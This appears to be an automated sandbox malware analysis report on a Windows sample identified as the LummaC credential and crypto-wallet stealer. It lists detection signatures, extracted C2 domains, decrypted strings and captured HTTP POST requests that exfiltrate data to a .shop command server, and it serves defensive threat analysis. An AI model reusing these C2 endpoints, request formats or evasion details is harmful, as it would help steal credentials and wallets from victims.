Edit tour

Windows Analysis Report
VoGtelkHSn.exe

Overview

General Information

Sample name:	VoGtelkHSn.exe renamed because original name is a hash value
Original sample name:	7f26737f63fcd5b7e2695f438e341075.exe
Analysis ID:	1431970
MD5:	7f26737f63fcd5b7e2695f438e341075
SHA1:	325092e21e3089979756be19047c44bc4d036dc6
SHA256:	ba7b9fc2750021800299ae2473acdcc6f5bf93e391bebe5da3cd7959904980ff
Tags:	32exetrojan
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

VoGtelkHSn.exe (PID: 5444 cmdline: "C:\Users\user\Desktop\VoGtelkHSn.exe" MD5: 7F26737F63FCD5B7E2695F438E341075)

WerFault.exe (PID: 3712 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5444 -s 1612 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-lummac2-94111d4b1e11	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "strollheavengwu.shop"], "Build id": "P6Mk0M--superstar"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2298209608.0000000002BF7000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1150:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: VoGtelkHSn.exe PID: 5444	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: VoGtelkHSn.exe PID: 5444	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Snort Signatures

ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) - Source IP: 192.168.2.5 - Destination IP: 172.67.163.209

Timestamp:	04/26/24-05:44:01.105350
SID:	2052230
Source Port:	49706
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) - Source IP: 192.168.2.5 - Destination IP: 172.67.163.209

Timestamp:	04/26/24-05:44:03.319178
SID:	2052230
Source Port:	49708
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) - Source IP: 192.168.2.5 - Destination IP: 172.67.163.209

Timestamp:	04/26/24-05:43:59.940120
SID:	2052230
Source Port:	49705
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) - Source IP: 192.168.2.5 - Destination IP: 172.67.163.209

Timestamp:	04/26/24-05:44:05.638317
SID:	2052230
Source Port:	49710
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (strollheavengwu .shop) - Source IP: 192.168.2.5 - Destination IP: 1.1.1.1

Timestamp:	04/26/24-05:43:58.725101
SID:	2052229
Source Port:	57412
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) - Source IP: 192.168.2.5 - Destination IP: 172.67.163.209

Timestamp:	04/26/24-05:44:04.568308
SID:	2052230
Source Port:	49709
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) - Source IP: 192.168.2.5 - Destination IP: 172.67.163.209

Timestamp:	04/26/24-05:43:58.891180
SID:	2052230
Source Port:	49704
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) - Source IP: 192.168.2.5 - Destination IP: 172.67.163.209

Timestamp:	04/26/24-05:44:07.287198
SID:	2052230
Source Port:	49711
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) - Source IP: 192.168.2.5 - Destination IP: 172.67.163.209

Timestamp:	04/26/24-05:44:02.110134
SID:	2052230
Source Port:	49707
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://strollheavengwu.shop/api

Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.2.VoGtelkHSn.exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "strollheavengwu.shop"], "Build id": "P6Mk0M--superstar"}

Multi AV Scanner detection for domain / URL

Source: shortsvelventysjo.shop	Virustotal: Detection: 16%	Perma Link
Source: liabilitynighstjsko.shop	Virustotal: Detection: 17%	Perma Link
Source: tolerateilusidjukl.shop	Virustotal: Detection: 14%	Perma Link
Source: incredibleextedwj.shop	Virustotal: Detection: 14%	Perma Link
Source: https://strollheavengwu.shop/apiV	Virustotal: Detection: 9%	Perma Link
Source: shatterbreathepsw.shop	Virustotal: Detection: 17%	Perma Link
Source: demonstationfukewko.shop	Virustotal: Detection: 18%	Perma Link
Source: https://strollheavengwu.shop/api	Virustotal: Detection: 11%	Perma Link
Source: productivelookewr.shop	Virustotal: Detection: 16%	Perma Link
Source: alcojoldwograpciw.shop	Virustotal: Detection: 17%	Perma Link

Multi AV Scanner detection for submitted file

Source: VoGtelkHSn.exe	ReversingLabs: Detection: 42%
Source: VoGtelkHSn.exe	Virustotal: Detection: 41%			Perma Link

Machine Learning detection for sample

Source: VoGtelkHSn.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmp	String decryptor: demonstationfukewko.shop
Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmp	String decryptor: liabilitynighstjsko.shop
Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmp	String decryptor: alcojoldwograpciw.shop
Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmp	String decryptor: incredibleextedwj.shop
Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmp	String decryptor: shortsvelventysjo.shop
Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmp	String decryptor: shatterbreathepsw.shop
Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmp	String decryptor: tolerateilusidjukl.shop
Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmp	String decryptor: productivelookewr.shop
Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmp	String decryptor: strollheavengwu.shop
Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmp	String decryptor: P6Mk0M--superstar

Source: C:\Users\user\Desktop\VoGtelkHSn.exe

Code function: 0_2_00415999 CryptUnprotectData,

0_2_00415999

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\VoGtelkHSn.exe

Unpacked PE file: 0.2.VoGtelkHSn.exe.400000.0.unpack

Source: VoGtelkHSn.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\VoGtelkHSn.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49711 version: TLS 1.2

Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00422458
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0041C540
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	0_2_004357CA
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov edx, dword ptr [esp+04h]	0_2_004359E2
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov ecx, dword ptr [esp+000000A4h]	0_2_00414C49
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov ecx, dword ptr [esp+08h]	0_2_00433D10
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov edx, dword ptr [esp+08h]	0_2_00433D10
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov eax, dword ptr [esi+70h]	0_2_00424087
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov eax, dword ptr [esi+70h]	0_2_00424084
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	0_2_0040D140
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov esi, ebp	0_2_00403260
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov eax, dword ptr [esi+70h]	0_2_00423943
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov edx, dword ptr [esi+10h]	0_2_0041F234
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then inc ebx	0_2_004142F0
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov dword ptr [esi+000005E0h], 00000000h	0_2_004103EF
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then push 00000000h	0_2_0041E451
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	0_2_0041A420
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_0041A420
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then jmp ecx	0_2_00414596
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov edx, dword ptr [esi+10h]	0_2_0041F640
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_004146E6
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov edx, dword ptr [esi+4Ch]	0_2_0042271D
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then inc eax	0_2_004137C9
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then movzx ebx, word ptr [edx]	0_2_0041F828
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then cmp word ptr [ebx+esi+02h], 0000h	0_2_0041A8C0
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_0042F890
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov byte ptr [ebx], cl	0_2_0042594F
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov byte ptr [ebx], cl	0_2_004259CD
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov byte ptr [ebx], cl	0_2_004259D2
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000000E0h]	0_2_00411A44
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then inc ebx	0_2_0040FA49
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then movzx ebp, byte ptr [eax+edx]	0_2_00431A70
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then jmp edx	0_2_00437C47
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then jmp edx	0_2_00437C45
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov edx, dword ptr [esi+000000C0h]	0_2_00413C46
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	0_2_00421CC7
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov edx, dword ptr [esi+30h]	0_2_00424CB0
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov ecx, dword ptr [esp+00000084h]	0_2_00415D7D
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov edx, dword ptr [esi+000005E0h]	0_2_00413E4A
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov eax, dword ptr [esi+70h]	0_2_02ED42EE
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov eax, dword ptr [esi+70h]	0_2_02ED42EB
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	0_2_02EBD3A7
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then cmp byte ptr [esi+ebx+01h], 00000000h	0_2_02ECD377
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov edx, dword ptr [esi+000005E0h]	0_2_02EC40B1
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_02ED26BF
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then push 00000000h	0_2_02ECE6B8
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	0_2_02ECA687
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_02ECA687
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov dword ptr [esi+000005E0h], 00000000h	0_2_02EC0656
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then jmp ecx	0_2_02EC47FD
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_02ECC7A7
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov esi, ebp	0_2_02EB34C7
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov eax, dword ptr [esi+70h]	0_2_02ED3BAA
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov edx, dword ptr [esi+10h]	0_2_02ECF49B
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov edx, dword ptr [00440984h]	0_2_02EC7494
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then inc ebx	0_2_02EC4557
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_02EDFAF7
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then movzx ebx, word ptr [edx]	0_2_02ECFA8F
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then inc eax	0_2_02EC3A30
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	0_2_02EE5A31
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov byte ptr [ebx], cl	0_2_02ED5BB6
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then cmp word ptr [ebx+esi+02h], 0000h	0_2_02ECAB27
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov edx, dword ptr [esi+10h]	0_2_02ECF8A7
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov edx, dword ptr [esi+4Ch]	0_2_02ED2984
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_02EC494D
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then jmp edx	0_2_02EE7EAE
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov edx, dword ptr [esi+000000C0h]	0_2_02EC3EAD
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then jmp edx	0_2_02EE7EAC
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov ecx, dword ptr [esp+000000A4h]	0_2_02EC4EB0
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov ecx, dword ptr [esp+00000084h]	0_2_02EC5FE4
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov ecx, dword ptr [esp+08h]	0_2_02EE3F77
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov edx, dword ptr [esp+08h]	0_2_02EE3F77
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	0_2_02ED1F2E
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov edx, dword ptr [esi+30h]	0_2_02ED4F17
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then movzx ebp, byte ptr [eax+edx]	0_2_02EE1CD7
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000000E0h]	0_2_02EC1CAB
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then inc ebx	0_2_02EBFCB0
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov edx, dword ptr [esp+04h]	0_2_02EE5C49
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov byte ptr [ebx], cl	0_2_02ED5C39
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 4x nop then mov byte ptr [ebx], cl	0_2_02ED5C34

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2052229 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (strollheavengwu .shop) 192.168.2.5:57412 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.5:49704 -> 172.67.163.209:443
Source: Traffic	Snort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.5:49705 -> 172.67.163.209:443
Source: Traffic	Snort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.5:49706 -> 172.67.163.209:443
Source: Traffic	Snort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.5:49707 -> 172.67.163.209:443
Source: Traffic	Snort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.5:49708 -> 172.67.163.209:443
Source: Traffic	Snort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.5:49709 -> 172.67.163.209:443
Source: Traffic	Snort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.5:49710 -> 172.67.163.209:443
Source: Traffic	Snort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.5:49711 -> 172.67.163.209:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: demonstationfukewko.shop
Source: Malware configuration extractor	URLs: liabilitynighstjsko.shop
Source: Malware configuration extractor	URLs: alcojoldwograpciw.shop
Source: Malware configuration extractor	URLs: incredibleextedwj.shop
Source: Malware configuration extractor	URLs: shortsvelventysjo.shop
Source: Malware configuration extractor	URLs: shatterbreathepsw.shop
Source: Malware configuration extractor	URLs: tolerateilusidjukl.shop
Source: Malware configuration extractor	URLs: productivelookewr.shop
Source: Malware configuration extractor	URLs: strollheavengwu.shop

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: strollheavengwu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 58Host: strollheavengwu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12839Host: strollheavengwu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15081Host: strollheavengwu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20571Host: strollheavengwu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5448Host: strollheavengwu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1385Host: strollheavengwu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 577060Host: strollheavengwu.shop

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: strollheavengwu.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: strollheavengwu.shop

Source: VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
